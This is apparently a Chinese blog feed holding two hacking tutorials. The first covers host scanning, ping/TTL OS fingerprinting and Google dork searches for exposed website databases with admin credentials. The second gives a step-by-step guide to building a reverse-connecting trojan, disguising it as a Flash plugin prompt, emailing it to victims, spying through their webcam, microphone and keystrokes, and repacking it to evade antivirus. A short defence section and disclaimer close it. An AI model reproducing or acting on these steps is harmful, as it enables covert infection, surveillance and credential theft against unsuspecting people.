  第2步:在完成下载并解压后,运行其中的“Xscan_gui.exe”打开如图所示的界面。

 
  图1
  第3步:依次单击“设置”→“扫描参数”菜单,在弹出的如图所示对话框中,在“检测范围”设置面板的“指定IP范围”栏中输入要扫描的目标电脑的IP地址。

 
  图2
  第4步:在“全局设置”→“扫描模块”设置界面中勾选“远程操作系统”项,通过右侧的说明,可以看出远程电脑的操作系统识别是通过“SNMP、NETBIOS协议主动识别远程操作系统类型及版本”插件来完成的,如图2-3所示。

 
  图3
  第5步:在单击“确定”按钮返回到“Xscan_gui.exe”主窗口后,单击“开始扫描”按钮后,耐心等待片刻就可以看到如图所示的扫描结果了。

 
  图4
  第6步:在左侧的扫描目标右侧可以看到“Windows 2003”的标识,这告诉我们这是一台正在使用Windows 2003的电脑,进而可以分析出这台电脑可能是台服务器,理由很简单:个人电脑一般只会安装Windows XP或Vista。
  二、活用Ping命令 轻松获取网络连接与系统信息
  Ping命令是测试网络连接、信息发送和接收状况的实用型工具,这是一个系统内置的探测工具。下面给出一些Ping命令的典型使用方法,以及如何判断系统相关信息。
  实例1:检测本机
  要检测本机的网卡驱动程序及TCP/IP协议是否正常,只需在“命令提示符”窗口中输入“Ping 127.0.0.1”命令即可。由于127.0.0.1这个保留的IP地址指向到本机,所以可以通过此命令来检查本机的网卡驱动。
  实例2:多参数合用检测
  假设,现在使用“Ping –a -t 202.102.48.141”命令对IP地址为202.102.48. 141的计算机进行探测,可以得到如图所示的反馈信息。

 
  图5
  通过反馈信息,可以得知上述命令中的参数“-a”检测出了该机的Net BIOS名为dns.sq.js.cn;参数“-t”在不断向该机发送数据包。
  通常,Ping命令会反馈如下两种结果:
  结果1:请求超时
  这表示没有收到网络设备返回的响应数据包,也就是说网络不通。出现这个结果原因很复杂,通常有如下几种可能:
  对方装有防火墙并禁止ICMP回显。
  对方已经关机。
  本机的IP设置不正确或网关设置错误。
  网线不通。
  结果2:来自 202.102.*.141 的回复: 字节=32 时间
  这表示网络畅通,探测使用的数据包大小为32Bytes,响应时间小于1ms。TTL这个值需要细说一下,TTL全称“Time To Live”,中文意思就是存活时间,是指一个数据包在网络中的生存周期,网管可以通过它了解网络环境,辅助维护工作,通过TTL值可以粗略判断出对方计算机使用的操作系统类型,以及本机到达目标主机所经过的路由数。例举:
  当检查本机的网络连通情况时,通常会使用Ping命令给某个目标主机(如本机)发送ICMP数据包。在本机中生成ICMP数据包时,系统就会给这个ICMP数据包初始化一个TTL值,如Windows XP就会生成“128”,然后将这个ICMP数据包发送出去,遇到网络路由设备转发时,TTL值就会被减去“1”,最后到达目标主机,如果在转发过程中TTL值变成“0”,路由设备就会丢弃这个ICMP数据包。
  提示:TTL值在网络应用中很有用处,可以根据返回信息中的TTL值来推断发送的数据包到达目标主机所经过的路由数。路由发生在0SI网络参考模型中的第三层即网络层。
  例如,用户要根据Ping命令返回的TTL值,判断到达IP地址为“202.102.48.141”的目标主机所经过的路由数。在命令提示符下输入“Ping 202.102.48.141”命令后,接着会显示信息“Reply from 202.102.48.141: bytes=32 time=15ms TTL=126”,可以看出返回的TTL值为126,与Windows NT/2000/XP主机的TTL值128最接近,因此可以推断出该主机类型可能为Windows NT/2000/XP中的一种,又因为“128-126=2”,所以可以得知数据到达该主机经过了2个路由。
  提示:不同的操作系统,它的TTL值也是不相同的。默认情况下,Linux系统的TTL值为64或255,Windows NT/2000/XP系统的TTL值为128,Windows 98系统的值为32,UNIX主机的TTL值为255。

 

三、搜索引擎 轻松探测网站漏洞
  通过搜索引擎网站,黑客可以通过搜索特殊的“关键词”来查找到一些具有漏洞的网站。比方说,在动态网站中一般会有CONN.ASP这个文件,它用于存储数据库文件的路径、名称等信息。显然,这个文件是非常重要的,所以,黑客在搜索引擎中总是喜欢使用它做为搜索关键词,如:
  inurl:/admin+conn.asp
  其中,admin表示后台管理目录,它通常用于存储所有的管理文件。当然,也可以改成一些其它的目录名,但目录名要在网站中存在才行,如图所示。

 
  图6
  在单击第一个搜索结果后,将会打开如图所示的页面,在这里可以看到这个网站的管理结构。

 
  图7
  其中,甚至可以看到存储网站内容(如管理员用户名和密码)的数据库文件(后缀名为mdb),在单击此文件后,可以立即把它下载到当前电脑中。
  在使用Access 2007等软件打开此数据库文件后,就可以获得网站各种重要的信息了,此时,网站的管理权限已经意味着被黑客得手了。
  提示:在www.google.com中黑客使用的关键词有很多,如upload.asp site:tw、inurl:winnt\system32\inetsrv\等,这些关键词都可以为黑客起到为虎作伥的作用。
  四、超乎想象 Google Hacker探测实例
  当搜索引擎的强大“入侵”功能让黑客着迷时,各种各样可以利用搜索引擎来进行黑客任务的工具就层出不穷了。下面,就以实例的方法为读者们演示一下“Google Hacker”的使用过程。为此,需要执行如下操作:
  第1步:首先下载“Google Hacker”这款软件。
  第2步:接着,在“关键词”列表中选择一个关键词,并单击“Google it”按钮继续,如图所示。

 
  图8
  第3步:随即,将会打开IE浏览器访问www.goole.com,并会自动输入指定的关键词进行搜索,如图所示。

 
  图9
  第4步:由于列举的关键词都是常见的漏洞,所以搜索结果的数量通常都会比较惊人。

]]> http://blog.edotpower.com/default.asp?id=150 <![CDATA[看骇客如何种木马]]> star520dust@163.com(stardust) Wed,10 Jun 2009 22:43:26 +0800 http://blog.edotpower.com/default.asp?id=150 相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀。

  操作步骤:

  Step1 种植木马

  现在网络上流行的木马基本上都采用的是C/S结构(客户端/服务端)。你要使用木马控制对方的电脑,首先需要在对方的的电脑中种植并运行服务端程序,然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。

  为了避免不熟悉木马的用户误运行服务端,现在流行的木马都没有提供单独的服务端程序,而是通过用户自己设置来生成服务端,黑洞2004也是这样。首先运行黑洞2004,点击“功能/生成服务端”命令,弹出“服务端配置”界面。由于黑洞2004采用了反弹技术(请参加小知识),首先单击旁边的“查看”按钮,在弹出的窗口中设置新的域名,输入你事先申请空间的域名和密码,单击“域名注册”,在下面的窗口中会反映出注册的情况。域名注册成功以后,返回“服务端配置”界面,填入刚刚申请的域名,以及“上线显示名称”、“注册表启动名称”等项目。为了迷惑他人,可以点“更改服务端图标”按钮为服务端选择一个图标。所有的设置都完成后,点击“生成EXE型服务端”就生成了一个服务端。在生成服务端的同时,软件会自动使用UPX为服务端进行压缩,对服务端起到隐藏保护的作用。

  服务端生成以后,下一步要做的是将服务端植入别人的电脑?常见的方法有,通过系统或者软件的漏洞入侵别人的电脑把木马的服务端植入其的电脑;或者通过Email夹带,把服务端作为附件寄给对方;以及把服务端进行伪装后放到自己的共享文件夹,通过P2P软件(比如PP点点通、百宝等),让网友在毫无防范中下载并运行服务端程序。

  由于本文主要面对普通的网络爱好者,所以就使用较为简单的Email夹带,为大家进行讲解。我们使用大家经常会看到的Flash动画为例,建立一个文件夹命名为“好看的动画”,在该文件夹里边再建立文件夹“动画.files”,将木马服务端软件放到该文件夹中假设名称为“abc.exe”,再在该文件夹内建立flash文件,在flash文件的第1帧输入文字“您的播放插件不全,单击下边的按钮,再单击打开按钮安装插件”,新建一个按钮组件,将其拖到舞台中,打开动作面板,在里边输入“on(press)getURL("动画.files/abc.exe");”,表示当单击该按钮时执行abc这个文件。在文件夹“好看的动画”中新建一个网页文件命名为“动画.htm”,将刚才制作的动画放到该网页中。看出门道了吗?平常你下载的网站通常就是一个.html文件和一个结尾为.files的文件夹,我们这么构造的原因也是用来迷惑打开者,毕竟没有几个人会去翻.files文件夹。现在我们就可以撰写一封新邮件了,将文件夹“好看的动画”压缩成一个文件,放到邮件的附件中,再编写一个诱人的主题。只要对方深信不疑的运行它,并重新启动系统,服务端就种植成功了。

  Step2 使用木马

  成功的给别人植入木马服务端后,就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术,所以服务端上线后会自动和客户端进行连接,这时,我们就可以操控客户端对服务端进行远程控制。在黑洞2004下面的列表中,随便选择一台已经上线的电脑,然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。

  文件管理:服务端上线以后,你可以通过“文件管理”命令对服务端电脑

中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹,并且支持断点传输。简单吧?

  进程管理:查看、刷新、关闭对方的进程,如果发现有杀毒软件或者防火墙,就可以关闭相应的进程,达到保护服务器端程序的目的。

  窗口管理:管理服务端电脑的程序窗口,你可以使对方窗口中的程序最大化、最小化、正常关闭等操作,这样就比进程管理更灵活。你可以搞很多恶作剧,比如让对方的某个窗口不停的最大化和最小化。

  视频监控和语音监听:如果远程服务端电脑安装有USB摄像头,那么可以通过它来获取图像,并可直接保存为MediaPlay可以直接播放的Mpeg文件;需要对方有麦克风的话,还可以听到他们的谈话,恐怖吧?

  除了上面介绍的这些功能以外,还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能,操作都非常简单,明白了吧?做骇客其实很容易。

  Step3 隐藏

  随着杀毒软件病毒库的升级,木马会很快被杀毒软件查杀,所以为了使木马服务端辟开杀毒软件的查杀,长时间的隐藏在别人的电脑中,在木马为黑客提供几种可行的办法。

  1.木马的自身保护

  就像前面提到的,黑洞2004在生成服务端的时候,用户可以更换图标,并使用软件UPX对服务端自动进行压缩隐藏。

  2.捆绑服务端

  用户通过使用文件捆绑器把木马服务端和正常的文件捆绑在一起,达到欺骗对方的目的。文件捆绑器有广外文件捆绑器2002、万能文件捆绑器、exeBinder、ExeBundle等。

  3.制做自己的服务端

  上面提到的这些方法虽然能一时瞒过杀毒软件,但最终还是不能逃脱杀毒软件的查杀,所以若能对现有的木马进行伪装,让杀毒软件无法辨别,则是个治本的方法。可以通过使用压缩EXE和DLL文件的压缩软件对服务端进行加壳保护。例如Step1中的UPX就是这样一款压缩软件,但默认该软件是按照自身的设置对服务端压缩的,因此得出的结果都相同,很难长时间躲过杀毒软件;而自己对服务端进行压缩,就可以选择不同的选项,压缩出与众不同的服务端来,使杀毒软件很难判断。下面我就以冰河为例,为大家简单的讲解一下脱壳(解压)、加壳(压缩)的过程。

  如果我们用杀毒软件对冰河进行查杀,一定会发现2个病毒,一个是冰河的客户端,另一个是服务端。使用软件“PEiD”查看软件的服务端是否已经被作者加壳,从图中可以看到服务端已经使用UPX进行了压缩。

  现在,我们就需要对软件进行脱壳,也就是一种解压的过程。这里我使用了“UPXUnpack”,选择需要的文件后,点击“解压缩”就开始执行脱壳。

  脱壳完成后,我们需要为服务端加一个新壳,加壳的软件很多,比如:ASPack、ASProtect、UPXShell、Petite等。这里以“ASPack”为例,点击“打开”按钮,选择刚刚脱壳的服务端程序,选择完成后ASPack会自动为服务端进行加壳。再次用杀毒软件对这个服务端进行查杀,发现其已经不能识别判断了。如果你的杀毒软件依旧可以查杀,你还可以使用多个软件对服务端进行多次加壳。笔者在使用Petite和ASPack对服务端进行2次加壳后,试用了多种杀毒软件都没有扫描出来。现在网络中流行的很多XX版冰河,就是网友通过对服务端进行修改并重新加壳后制做出来的。

  Step4 防范

  防范重于治疗,在我们的电脑还没有中木马前,我们需要做很多必要的工作,比如:安装杀毒软件和网络防火墙;及时更新病毒库以及系统的安全补丁;定时备份硬盘上的文件;不要运行来路不明的软件和打开来路不明的邮件。

  最后笔者要特别提醒大家,木马除了拥有强大的远程控制功能外,还

包括极强的破坏性。我们学习它,只是为了了解它的技术与方法,而不是用于盗窃密码等破坏行为,希望大家好自为之。

  小知识:反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让自己开始连接时,就主动连接,如此就可完成连接工作。因此在互联网上可以访问到局域网里通过NAT(透明代理)代理上网的电脑,并且可以穿过防火墙。与传统的远程控制软件相反,反弹端口型软件的服务端会主动连接客户端,客户端的监听端口一般开为80(即用于网页浏览的端口),这样,即使用户在命令提示符下使用“netstat-a”命令检查自己的端口,发现的也是类似“TCPUserIP:3015ControllerIP:httpESTABLISHED”的情况,稍微疏忽一点你就会以为是自己在浏览网页,而防火墙也会同样这么认为的。于是,与一般的软件相反,反弹端口型软件的服务端主动连接客户端,这样就可以轻易的突破防火墙的限制。

]]>